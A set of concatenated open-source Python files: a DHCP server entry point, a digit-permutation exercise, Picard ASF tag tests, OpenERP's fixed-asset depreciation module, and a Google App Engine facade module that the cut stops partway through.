help="config: The location of the config file")
args = argparser.parse_args()
# Parse the config file.
config = configparser.ConfigParser()
try:
with open(args.config_file) as config_file:
try:
config.read_file(config_file)
except AttributeError: # Python2
config.readfp(config_file)
except (OSError, IOError):
logging.error('Failed to open the config file.')
return
# Parse the argument.
server_ip = ''
server_port = 0
client_port = 0
aaserver_addr = ''
debug_level = None
try:
server_ip = config.get('pbaadhcpserver', 'server_ip') #pylint: disable=R0204
server_port = config.getint('pbaadhcpserver', 'server_port') #pylint: disable=R0204
client_port = config.getint('pbaadhcpserver', 'client_port') #pylint: disable=R0204
aaserver_addr = config.get('pbaadhcpserver', 'aaserver_addr') #pylint: disable=R0204
debug_level = config.get('pbaadhcpserver', 'debug_level') #pylint: disable=R0204
except (configparser.NoSectionError, configparser.NoOptionError):
logging.error('Failed to parse the config file.')
return
# Set the logging format and logging level.
numeric_level = getattr(logging, debug_level.upper(), logging.DEBUG) #pylint: disable=E1101
logging.basicConfig(
format='%(levelname)s:%(message)s', level=numeric_level
)
logging.info('DHCP Server is listening on %s:%s',
server_ip, server_port)
logging.info('Client port is %s, address assign server is at %s',
client_port, aaserver_addr)
dhcpd = PBAADHCPServer(server_ip, server_port, client_port,
aaserver_addr)
while True:
dhcpd.get_next_dhcp_packet()
if __name__ == '__main__':
main()
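# A minimal config.ini sketch for the section read by main() above; the key
# names come from the code, the values are illustrative assumptions only:
#
#   [pbaadhcpserver]
#   server_ip = 192.168.1.1
#   server_port = 67
#   client_port = 68
#   aaserver_addr = http://127.0.0.1:5000
#   debug_level = INFO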
|
lcy0321/pbaadhcpserver
|
pbaadhcpserver.py
|
Python
|
gpl-3.0
| 15,974 | 0.00144 |
def find_number(x):
str_x = str(x)
if len(str_x) == 1:
raise Exception()
left_most = str_x[0]
try:
small_from_rest = find_number(int(str_x[1:]))
return int(left_most + str(small_from_rest))
except:
        # min() raises ValueError when this list is empty, i.e. no digit to the right of left_most is greater than it.
new_left_most = min([c for c in str_x[1:] if c > left_most])
# assumption: no repeated digit
rest_of_digits = ''.join(sorted([c for c in str_x if c != new_left_most]))
y = new_left_most + rest_of_digits
return int(y)
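# Illustrative trace (assumes distinct digits, as noted above): find_number(5346)
# recurses on 346 -> 46 -> 6 (single digit, base case raises), then rebuilds
# 46 -> 64, 346 -> 364, 5346 -> 5364, i.e. the next larger number with the same digits.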
print(find_number(5346))
|
danithaca/berrypicking
|
python/excercise/march31.py
|
Python
|
gpl-2.0
| 644 | 0.007764 |
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from mutagen.asf import ASFByteArrayAttribute
from test.picardtestcase import (
PicardTestCase,
create_fake_png,
)
from picard.formats import (
asf,
ext_to_format,
)
from .common import (
CommonTests,
load_metadata,
load_raw,
save_metadata,
save_raw,
skipUnlessTestfile,
)
from .coverart import CommonCoverArtTests
# prevent unittest from running tests in these classes
class CommonAsfTests:
class AsfTestCase(CommonTests.TagFormatsTestCase):
def test_supports_tag(self):
fmt = ext_to_format(self.testfile_ext[1:])
self.assertTrue(fmt.supports_tag('copyright'))
self.assertTrue(fmt.supports_tag('compilation'))
self.assertTrue(fmt.supports_tag('bpm'))
self.assertTrue(fmt.supports_tag('djmixer'))
self.assertTrue(fmt.supports_tag('discnumber'))
self.assertTrue(fmt.supports_tag('lyrics:lead'))
self.assertTrue(fmt.supports_tag('~length'))
for tag in self.replaygain_tags.keys():
self.assertTrue(fmt.supports_tag(tag))
@skipUnlessTestfile
def test_ci_tags_preserve_case(self):
# Ensure values are not duplicated on repeated save and are saved
# case preserving.
tags = {
'Replaygain_Album_Peak': '-6.48 dB'
}
save_raw(self.filename, tags)
loaded_metadata = load_metadata(self.filename)
loaded_metadata['replaygain_album_peak'] = '1.0'
save_metadata(self.filename, loaded_metadata)
raw_metadata = load_raw(self.filename)
self.assertIn('Replaygain_Album_Peak', raw_metadata)
self.assertEqual(raw_metadata['Replaygain_Album_Peak'][0], loaded_metadata['replaygain_album_peak'])
self.assertEqual(1, len(raw_metadata['Replaygain_Album_Peak']))
self.assertNotIn('REPLAYGAIN_ALBUM_PEAK', raw_metadata)
def _test_invalid_picture(self, invalid_picture_data):
png_data = create_fake_png(b'x')
tags = {
'WM/Picture': [
ASFByteArrayAttribute(invalid_picture_data),
ASFByteArrayAttribute(
asf.pack_image("image/png", png_data)
)
]
}
save_raw(self.filename, tags)
metadata = load_metadata(self.filename)
self.assertEqual(1, len(metadata.images))
self.assertEqual(png_data, metadata.images[0].data)
@skipUnlessTestfile
def test_ignore_invalid_wm_picture(self):
# A picture that cannot be unpacked
self._test_invalid_picture(b'notapicture')
class ASFTest(CommonAsfTests.AsfTestCase):
testfile = 'test.asf'
supports_ratings = True
expected_info = {
'length': 92,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
}
class WMATest(CommonAsfTests.AsfTestCase):
testfile = 'test.wma'
supports_ratings = True
expected_info = {
'length': 139,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '64.0',
}
unexpected_info = ['~video']
class WMVTest(CommonAsfTests.AsfTestCase):
testfile = 'test.wmv'
supports_ratings = True
expected_info = {
'length': 565,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
'~video': '1',
}
class AsfUtilTest(PicardTestCase):
test_cases = [
# Empty MIME, description and data
(('', b'', 2, ''), b'\x02\x00\x00\x00\x00\x00\x00\x00\x00'),
# MIME, description set, 1 byte data
(('M', b'x', 2, 'D'), b'\x02\x01\x00\x00\x00M\x00\x00\x00D\x00\x00\x00x'),
# Empty MIME and description, 3 byte data
(('', b'abc', 0, ''), b'\x00\x03\x00\x00\x00\x00\x00\x00\x00abc'),
]
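    # Layout exercised by the cases above: 1 byte picture type, 4-byte
    # little-endian data length, null-terminated UTF-16-LE mime string,
    # null-terminated UTF-16-LE description string, then the raw image bytes.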
def test_pack_and_unpack_image(self):
mime = 'image/png'
image_data = create_fake_png(b'x')
image_type = 4
description = 'testing'
tag_data = asf.pack_image(mime, image_data, image_type, description)
expected_length = 5 + 2 * len(mime) + 2 + 2 * len(description) + 2 + len(image_data)
self.assertEqual(tag_data[0], image_type)
self.assertEqual(len(tag_data), expected_length)
self.assertEqual(image_data, tag_data[-len(image_data):])
unpacked = asf.unpack_image(tag_data)
self.assertEqual(mime, unpacked[0])
self.assertEqual(image_data, unpacked[1])
self.assertEqual(image_type, unpacked[2])
self.assertEqual(description, unpacked[3])
def test_pack_image(self):
for args, expected in self.test_cases:
self.assertEqual(expected, asf.pack_image(*args))
def test_unpack_image(self):
for expected, packed in self.test_cases:
self.assertEqual(expected, asf.unpack_image(packed))
def test_unpack_image_value_errors(self):
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'')
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'\x02\x01\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x00\x00\x00\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "desc: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "image data size mismatch",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00\x00\x00x')
class AsfCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.asf'
class WmaCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.wma'
|
Sophist-UK/Sophist_picard
|
test/formats/test_asf.py
|
Python
|
gpl-2.0
| 6,957 | 0.00115 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
class account_asset_category(osv.osv):
_name = 'account.asset.category'
_description = 'Asset category'
_columns = {
'name': fields.char('Name', size=64, required=True, select=1),
'note': fields.text('Note'),
'account_analytic_id': fields.many2one('account.analytic.account', 'Analytic account'),
'account_asset_id': fields.many2one('account.account', 'Asset Account', required=True, domain=[('type','=','other')]),
'account_depreciation_id': fields.many2one('account.account', 'Depreciation Account', required=True, domain=[('type','=','other')]),
'account_expense_depreciation_id': fields.many2one('account.account', 'Depr. Expense Account', required=True, domain=[('type','=','other')]),
'journal_id': fields.many2one('account.journal', 'Journal', required=True),
'company_id': fields.many2one('res.company', 'Company', required=True),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Period Length', help="State here the time between 2 depreciations, in months", required=True),
'method_progress_factor': fields.float('Degressive Factor'),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True,
help="Choose the method to use to compute the dates and number of depreciation lines.\n"\
" * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
" * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
'method_end': fields.date('Ending date'),
        'prorata':fields.boolean('Prorata Temporis', help='Indicates that the first depreciation entry for this asset has to be done from the purchase date instead of the first of January'),
'open_asset': fields.boolean('Skip Draft State', help="Check this if you want to automatically confirm the assets of this category when created by invoices."),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.category', context=context),
'method': 'linear',
'method_number': 5,
'method_time': 'number',
'method_period': 12,
'method_progress_factor': 0.3,
}
def onchange_account_asset(self, cr, uid, ids, account_asset_id, context=None):
res = {'value':{}}
if account_asset_id:
res['value'] = {'account_depreciation_id': account_asset_id}
return res
class account_asset_asset(osv.osv):
_name = 'account.asset.asset'
_description = 'Asset'
def unlink(self, cr, uid, ids, context=None):
for asset in self.browse(cr, uid, ids, context=context):
if asset.account_move_line_ids:
raise osv.except_osv(_('Error!'), _('You cannot delete an asset that contains posted depreciation lines.'))
return super(account_asset_asset, self).unlink(cr, uid, ids, context=context)
def _get_period(self, cr, uid, context=None):
periods = self.pool.get('account.period').find(cr, uid, context=context)
if periods:
return periods[0]
else:
return False
def _get_last_depreciation_date(self, cr, uid, ids, context=None):
"""
        @param ids: ids of account.asset.asset objects
        @return: Returns a dictionary of the effective dates of the last depreciation entry made for the given asset ids. If there is none, the purchase date of the asset is returned.
"""
cr.execute("""
SELECT a.id as id, COALESCE(MAX(l.date),a.purchase_date) AS date
FROM account_asset_asset a
LEFT JOIN account_move_line l ON (l.asset_id = a.id)
WHERE a.id IN %s
GROUP BY a.id, a.purchase_date """, (tuple(ids),))
return dict(cr.fetchall())
def _compute_board_amount(self, cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=None):
#by default amount = 0
amount = 0
if i == undone_dotation_number:
amount = residual_amount
else:
if asset.method == 'linear':
amount = amount_to_depr / (undone_dotation_number - len(posted_depreciation_line_ids))
if asset.prorata:
amount = amount_to_depr / asset.method_number
days = total_days - float(depreciation_date.strftime('%j'))
if i == 1:
amount = (amount_to_depr / asset.method_number) / total_days * days
elif i == undone_dotation_number:
amount = (amount_to_depr / asset.method_number) / total_days * (total_days - days)
elif asset.method == 'degressive':
amount = residual_amount * asset.method_progress_factor
if asset.prorata:
days = total_days - float(depreciation_date.strftime('%j'))
if i == 1:
amount = (residual_amount * asset.method_progress_factor) / total_days * days
elif i == undone_dotation_number:
amount = (residual_amount * asset.method_progress_factor) / total_days * (total_days - days)
return amount
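    # Worked example (illustrative figures, prorata disabled): for a linear asset
    # with 1000.0 to depreciate over 5 lines, each line gets 200.0; with the
    # degressive method and factor 0.3 the lines are 300.0, 210.0, 147.0, 102.9
    # and the last line absorbs the remaining 240.1 (i == undone_dotation_number).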
def _compute_board_undone_dotation_nb(self, cr, uid, asset, depreciation_date, total_days, context=None):
undone_dotation_number = asset.method_number
if asset.method_time == 'end':
end_date = datetime.strptime(asset.method_end, '%Y-%m-%d')
undone_dotation_number = 0
while depreciation_date <= end_date:
depreciation_date = (datetime(depreciation_date.year, depreciation_date.month, depreciation_date.day) + relativedelta(months=+asset.method_period))
undone_dotation_number += 1
if asset.prorata:
undone_dotation_number += 1
return undone_dotation_number
def compute_depreciation_board(self, cr, uid, ids, context=None):
depreciation_lin_obj = self.pool.get('account.asset.depreciation.line')
currency_obj = self.pool.get('res.currency')
for asset in self.browse(cr, uid, ids, context=context):
if asset.value_residual == 0.0:
continue
posted_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_check', '=', True)],order='depreciation_date desc')
old_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_id', '=', False)])
if old_depreciation_line_ids:
depreciation_lin_obj.unlink(cr, uid, old_depreciation_line_ids, context=context)
amount_to_depr = residual_amount = asset.value_residual
if asset.prorata:
depreciation_date = datetime.strptime(self._get_last_depreciation_date(cr, uid, [asset.id], context)[asset.id], '%Y-%m-%d')
else:
# depreciation_date = 1st January of purchase year
purchase_date = datetime.strptime(asset.purchase_date, '%Y-%m-%d')
#if we already have some previous validated entries, starting date isn't 1st January but last entry + method period
if (len(posted_depreciation_line_ids)>0):
last_depreciation_date = datetime.strptime(depreciation_lin_obj.browse(cr,uid,posted_depreciation_line_ids[0],context=context).depreciation_date, '%Y-%m-%d')
depreciation_date = (last_depreciation_date+relativedelta(months=+asset.method_period))
else:
depreciation_date = datetime(purchase_date.year, 1, 1)
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
total_days = (year % 4) and 365 or 366
undone_dotation_number = self._compute_board_undone_dotation_nb(cr, uid, asset, depreciation_date, total_days, context=context)
for x in range(len(posted_depreciation_line_ids), undone_dotation_number):
i = x + 1
amount = self._compute_board_amount(cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=context)
company_currency = asset.company_id.currency_id.id
current_currency = asset.currency_id.id
# compute amount into company currency
amount = currency_obj.compute(cr, uid, current_currency, company_currency, amount, context=context)
residual_amount -= amount
vals = {
'amount': amount,
'asset_id': asset.id,
'sequence': i,
'name': str(asset.id) +'/' + str(i),
'remaining_value': residual_amount,
'depreciated_value': (asset.purchase_value - asset.salvage_value) - (residual_amount + amount),
'depreciation_date': depreciation_date.strftime('%Y-%m-%d'),
}
depreciation_lin_obj.create(cr, uid, vals, context=context)
# Considering Depr. Period as months
depreciation_date = (datetime(year, month, day) + relativedelta(months=+asset.method_period))
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
return True
def validate(self, cr, uid, ids, context=None):
if context is None:
context = {}
return self.write(cr, uid, ids, {
'state':'open'
}, context)
def set_to_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def set_to_draft(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'draft'}, context=context)
def _amount_residual(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
l.asset_id as id, SUM(abs(l.debit-l.credit)) AS amount
FROM
account_move_line l
WHERE
l.asset_id IN %s GROUP BY l.asset_id """, (tuple(ids),))
res=dict(cr.fetchall())
for asset in self.browse(cr, uid, ids, context):
res[asset.id] = asset.purchase_value - res.get(asset.id, 0.0) - asset.salvage_value
for id in ids:
res.setdefault(id, 0.0)
return res
def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):
val = {}
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
if company.currency_id.company_id and company.currency_id.company_id.id != company_id:
val['currency_id'] = False
else:
val['currency_id'] = company.currency_id.id
return {'value': val}
def onchange_purchase_salvage_value(self, cr, uid, ids, purchase_value, salvage_value, context=None):
val = {}
for asset in self.browse(cr, uid, ids, context=context):
if purchase_value:
val['value_residual'] = purchase_value - salvage_value
if salvage_value:
val['value_residual'] = purchase_value - salvage_value
return {'value': val}
_columns = {
'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.char('Asset Name', size=64, required=True, readonly=True, states={'draft':[('readonly',False)]}),
'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}),
'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'note': fields.text('Note'),
'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}),
'parent_id': fields.many2one('account.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}),
'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets'),
'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True,
help="When an asset is created, the status is 'Draft'.\n" \
"If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \
"You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."),
'active': fields.boolean('Active'),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"),
'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}),
'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}),
'value_residual': fields.function(_amount_residual, method=True, digits_compute=dp.get_precision('Account'), string='Residual Value'),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True, readonly=True, states={'draft':[('readonly',False)]},
help="Choose the method to use to compute the dates and number of depreciation lines.\n"\
" * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
" * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
        'prorata':fields.boolean('Prorata Temporis', readonly=True, states={'draft':[('readonly',False)]}, help='Indicates that the first depreciation entry for this asset has to be done from the purchase date instead of the first of January'),
'history_ids': fields.one2many('account.asset.history', 'asset_id', 'History', readonly=True),
'depreciation_line_ids': fields.one2many('account.asset.depreciation.line', 'asset_id', 'Depreciation Lines', readonly=True, states={'draft':[('readonly',False)],'open':[('readonly',False)]}),
'salvage_value': fields.float('Salvage Value', digits_compute=dp.get_precision('Account'), help="It is the amount you plan to have that you cannot depreciate.", readonly=True, states={'draft':[('readonly',False)]}),
}
_defaults = {
'code': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.asset.code'),
'purchase_date': lambda obj, cr, uid, context: time.strftime('%Y-%m-%d'),
'active': True,
'state': 'draft',
'method': 'linear',
'method_number': 5,
'method_time': 'number',
'method_period': 12,
'method_progress_factor': 0.3,
'currency_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.currency_id.id,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.asset',context=context),
}
def _check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_asset_asset, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
def _check_prorata(self, cr, uid, ids, context=None):
for asset in self.browse(cr, uid, ids, context=context):
if asset.prorata and asset.method_time != 'number':
return False
return True
_constraints = [
(_check_recursion, 'Error ! You cannot create recursive assets.', ['parent_id']),
(_check_prorata, 'Prorata temporis can be applied only for time method "number of depreciations".', ['prorata']),
]
def onchange_category_id(self, cr, uid, ids, category_id, context=None):
res = {'value':{}}
asset_categ_obj = self.pool.get('account.asset.category')
if category_id:
category_obj = asset_categ_obj.browse(cr, uid, category_id, context=context)
res['value'] = {
'method': category_obj.method,
'method_number': category_obj.method_number,
'method_time': category_obj.method_time,
'method_period': category_obj.method_period,
'method_progress_factor': category_obj.method_progress_factor,
'method_end': category_obj.method_end,
'prorata': category_obj.prorata,
}
return res
def onchange_method_time(self, cr, uid, ids, method_time='number', context=None):
res = {'value': {}}
if method_time != 'number':
res['value'] = {'prorata': False}
return res
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if context is None:
context = {}
default.update({'depreciation_line_ids': [], 'state': 'draft'})
return super(account_asset_asset, self).copy(cr, uid, id, default, context=context)
def _compute_entries(self, cr, uid, ids, period_id, context=None):
result = []
period_obj = self.pool.get('account.period')
depreciation_obj = self.pool.get('account.asset.depreciation.line')
period = period_obj.browse(cr, uid, period_id, context=context)
depreciation_ids = depreciation_obj.search(cr, uid, [('asset_id', 'in', ids), ('depreciation_date', '<=', period.date_stop), ('depreciation_date', '>=', period.date_start), ('move_check', '=', False)], context=context)
if context is None:
context = {}
context.update({'depreciation_date':period.date_stop})
return depreciation_obj.create_move(cr, uid, depreciation_ids, context=context)
def create(self, cr, uid, vals, context=None):
asset_id = super(account_asset_asset, self).create(cr, uid, vals, context=context)
self.compute_depreciation_board(cr, uid, [asset_id], context=context)
return asset_id
def open_entries(self, cr, uid, ids, context=None):
if context is None:
context = {}
context.update({'search_default_asset_id': ids, 'default_asset_id': ids})
return {
'name': _('Journal Items'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'account.move.line',
'view_id': False,
'type': 'ir.actions.act_window',
'context': context,
}
class account_asset_depreciation_line(osv.osv):
_name = 'account.asset.depreciation.line'
_description = 'Asset depreciation line'
def _get_move_check(self, cr, uid, ids, name, args, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = bool(line.move_id)
return res
_columns = {
'name': fields.char('Depreciation Name', size=64, required=True, select=1),
'sequence': fields.integer('Sequence', required=True),
'asset_id': fields.many2one('account.asset.asset', 'Asset', required=True, ondelete='cascade'),
'parent_state': fields.related('asset_id', 'state', type='char', string='State of Asset'),
'amount': fields.float('Current Depreciation', digits_compute=dp.get_precision('Account'), required=True),
'remaining_value': fields.float('Next Period Depreciation', digits_compute=dp.get_precision('Account'),required=True),
'depreciated_value': fields.float('Amount Already Depreciated', required=True),
'depreciation_date': fields.date('Depreciation Date', select=1),
'move_id': fields.many2one('account.move', 'Depreciation Entry'),
'move_check': fields.function(_get_move_check, method=True, type='boolean', string='Posted', store=True)
}
def create_move(self, cr, uid, ids, context=None):
can_close = False
if context is None:
context = {}
asset_obj = self.pool.get('account.asset.asset')
period_obj = self.pool.get('account.period')
move_obj = self.pool.get('account.move')
move_line_obj = self.pool.get('account.move.line')
currency_obj = self.pool.get('res.currency')
created_move_ids = []
asset_ids = []
for line in self.browse(cr, uid, ids, context=context):
depreciation_date = context.get('depreciation_date') or time.strftime('%Y-%m-%d')
period_ids = period_obj.find(cr, uid, depreciation_date, context=context)
company_currency = line.asset_id.company_id.currency_id.id
current_currency = line.asset_id.currency_id.id
context.update({'date': depreciation_date})
amount = currency_obj.compute(cr, uid, current_currency, company_currency, line.amount, context=context)
sign = (line.asset_id.category_id.journal_id.type == 'purchase' and 1) or -1
asset_name = line.asset_id.name
reference = line.name
move_vals = {
'name': asset_name,
'date': depreciation_date,
'ref': reference,
'period_id': period_ids and period_ids[0] or False,
'journal_id': line.asset_id.category_id.journal_id.id,
}
move_id = move_obj.create(cr, uid, move_vals, context=context)
journal_id = line.asset_id.category_id.journal_id.id
partner_id = line.asset_id.partner_id.id
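            # Two balanced journal items per depreciation line: a credit on the
            # accumulated depreciation account and a debit on the depreciation
            # expense account, both for the same company-currency amount.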
move_line_obj.create(cr, uid, {
'name': asset_name,
'ref': reference,
'move_id': move_id,
'account_id': line.asset_id.category_id.account_depreciation_id.id,
'debit': 0.0,
'credit': amount,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id,
'partner_id': partner_id,
'currency_id': company_currency != current_currency and current_currency or False,
'amount_currency': company_currency != current_currency and - sign * line.amount or 0.0,
'date': depreciation_date,
})
move_line_obj.create(cr, uid, {
'name': asset_name,
'ref': reference,
'move_id': move_id,
'account_id': line.asset_id.category_id.account_expense_depreciation_id.id,
'credit': 0.0,
'debit': amount,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id,
'partner_id': partner_id,
'currency_id': company_currency != current_currency and current_currency or False,
'amount_currency': company_currency != current_currency and sign * line.amount or 0.0,
'analytic_account_id': line.asset_id.category_id.account_analytic_id.id,
'date': depreciation_date,
'asset_id': line.asset_id.id
})
self.write(cr, uid, line.id, {'move_id': move_id}, context=context)
created_move_ids.append(move_id)
asset_ids.append(line.asset_id.id)
# we re-evaluate the assets to determine whether we can close them
for asset in asset_obj.browse(cr, uid, list(set(asset_ids)), context=context):
if currency_obj.is_zero(cr, uid, asset.currency_id, asset.value_residual):
asset.write({'state': 'close'})
return created_move_ids
class account_move_line(osv.osv):
_inherit = 'account.move.line'
_columns = {
'asset_id': fields.many2one('account.asset.asset', 'Asset', ondelete="restrict"),
'entry_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
}
class account_asset_history(osv.osv):
_name = 'account.asset.history'
_description = 'Asset history'
_columns = {
'name': fields.char('History name', size=64, select=1),
'user_id': fields.many2one('res.users', 'User', required=True),
'date': fields.date('Date', required=True),
'asset_id': fields.many2one('account.asset.asset', 'Asset', required=True),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True,
help="The method to use to compute the dates and number of depreciation lines.\n"\
"Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
"Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
'method_number': fields.integer('Number of Depreciations', help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Period Length', help="Time in month between two depreciations"),
'method_end': fields.date('Ending date'),
'note': fields.text('Note'),
}
_order = 'date desc'
_defaults = {
'date': lambda *args: time.strftime('%Y-%m-%d'),
'user_id': lambda self, cr, uid, ctx: uid
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ttfseiko/openerp-trunk
|
openerp/addons/account_asset/account_asset.py
|
Python
|
agpl-3.0
| 29,177 | 0.008568 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaegraph.business_base import NodeSearch, DeleteNode
from classificacaodtm_app.commands import ListClassificacaodtmCommand, SaveClassificacaodtmCommand, UpdateClassificacaodtmCommand, \
ClassificacaodtmPublicForm, ClassificacaodtmDetailForm, ClassificacaodtmShortForm
def save_classificacaodtm_cmd(**classificacaodtm_properties):
"""
Command to save Classificacaodtm entity
:param classificacaodtm_properties: a dict of properties to save on model
:return: a Command that save Classificacaodtm, validating and localizing properties received as strings
"""
return SaveClassificacaodtmCommand(**classificacaodtm_properties)
def update_classificacaodtm_cmd(classificacaodtm_id, **classificacaodtm_properties):
"""
Command to update Classificacaodtm entity with id equals 'classificacaodtm_id'
:param classificacaodtm_properties: a dict of properties to update model
:return: a Command that update Classificacaodtm, validating and localizing properties received as strings
"""
return UpdateClassificacaodtmCommand(classificacaodtm_id, **classificacaodtm_properties)
def list_classificacaodtms_cmd():
"""
Command to list Classificacaodtm entities ordered by their creation dates
:return: a Command proceed the db operations when executed
"""
return ListClassificacaodtmCommand()
def classificacaodtm_detail_form(**kwargs):
"""
Function to get Classificacaodtm's detail form.
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmDetailForm(**kwargs)
def classificacaodtm_short_form(**kwargs):
"""
    Function to get Classificacaodtm's short form. Just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmShortForm(**kwargs)
def classificacaodtm_public_form(**kwargs):
"""
    Function to get Classificacaodtm's public form. Just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
